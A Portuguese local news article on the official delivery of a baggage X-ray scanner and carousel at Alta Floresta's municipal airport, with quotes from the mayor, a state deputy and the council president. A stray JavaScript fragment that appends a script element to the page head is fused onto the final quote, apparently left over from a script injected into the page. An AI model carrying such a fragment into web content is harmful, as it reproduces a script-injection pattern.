Capa / Economia / Raio-x e esteira de bagagem abre portas para novos voos

Raio-x e esteira de bagagem abre portas para novos voos

asiel-esteira-e-raio-xInvestir no Aeroporto Municipal de Alta Floresta Piloto Osvaldo Marques Dias, com o propósito de oferecer segurança, conforto e comodidade aos passageiros, sempre esteve na pauta de prioridades da administração municipal.
Na manhã da última sexta-feira, dia 28 de outubro, o prefeito Asiel Bezerra de Araújo entregou de forma oficial o aparelho de raio-x de bagagem e a esteira de bagagem, dois importantes equipamentos para a operacionalização do aeroporto.
A solenidade de entrega contou com a presença do deputado estadual Ondanir Bortolini, Nininho, autor da emenda que garantiu a aquisição dos equipamentos, vereadores, secretários municipais, empresários e a coordenadora de aeroportos da Secretaria de Infraestrutura e Logística de Mato Grosso (Sinfra/MT), Maksaíla Moura Campos e Dirceu Cezi, gerente de operações da Infraero no município.
A partir de agora, o aparelho de raio-x de bagagem de mão entra em operação definitiva após um período de testes e já está proporcionando maior segurança e mais comodidade aos passageiros. Sem contar que com este equipamento funcionando, a Prefeitura de Alta Floresta cumpre uma das principais exigências da Agência Nacional de Aviação Civil (ANAC) voltada especificamente para o setor de segurança do aeroporto.
Antes da chegada deste aparelho a inspeção da bagagem de mão era feita pelos próprios operadores manualmente, ou seja, as malas eram vasculhadas criando uma sensação de constrangimento para o profissional e para o passageiro. Agora tudo é feito de forma eletrônica e rápida. A vistoria manual é feita apenas nos casos em que haja desconfiança sobre o conteúdo da bagagem.
O aparelho de raio-x está instalado na sala de embarque e conta com três câmeras de monitoramento por imagem. A partir de agora os passageiros em conexão de Alta Floresta passando por Cuiabá não serão submetidos a uma nova vistoria.
Já a esteira de bagagem proporciona mais comodidade, tendo em vista que antes os passageiros demoravam em média meia hora para resgatar suas bagagens. Hoje, com o equipamento em pleno funcionamento, a retirada das malas demora aproximadamente oito minutos.
Com estes investimentos Alta Floresta abre de vez as portas para a chegada de outras empresas. Atualmente a empresa Azul Linhas Aéreas opera vôo regular, com chegada às 13:45 horas e saída a partir das 14:15 horas.
O prefeito Asiel Bezerra de Araújo fez questão de agradecer o deputado Nininho pela emenda e ressaltou as melhorias realizadas no terminal, como, por exemplo, climatização, pintura interna e externa, além da capacitação da equipe técnica. “Melhoramos muito, tendo em vista a situação que nós recebemos o aeroporto quando nós assumimos a prefeitura. Estes equipamentos tem grande importância para a população de Alta Floresta, principalmente para mantermos o aeroporto funcionando nas condições que a Infraero e a Anac exigem, e possibilitam a vinda de novas empresas aéreas para o nosso município, além de garantir mais agilidade, segurança e conforto aos nossos passageiros. Temos um dos melhores aeroportos do Mato Grosso”, acentua Asiel.
O deputado Nininho, que destinou uma emenda parlamentar de R$ 200 mil para a aquisição do raio-x e da esteira de bagagem, lembrou que a falta desses dois equipamentos poderia causar transtornos à população e impedir que novas empresas venham operar em Alta Floresta. “É um valor talvez não tão expressivo, mas com um significado muito grande porque atende não somente Alta Floresta mais todos os municípios da região. Era uma cobrança do nosso prefeito Asiel Bezerra e graças ao apoio do governo do estado foi possível adquirir a esteira e o raio-x”, ressaltou.
O presidente Eloi Crestani enalteceu a aquisição dos equipamentos. “Em nome da Câmara de Vereadores e da população de Alta Floresta queremos agradecer o deputado e o prefeito por mais esta conquista. Eram um sonho da população”, disse.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top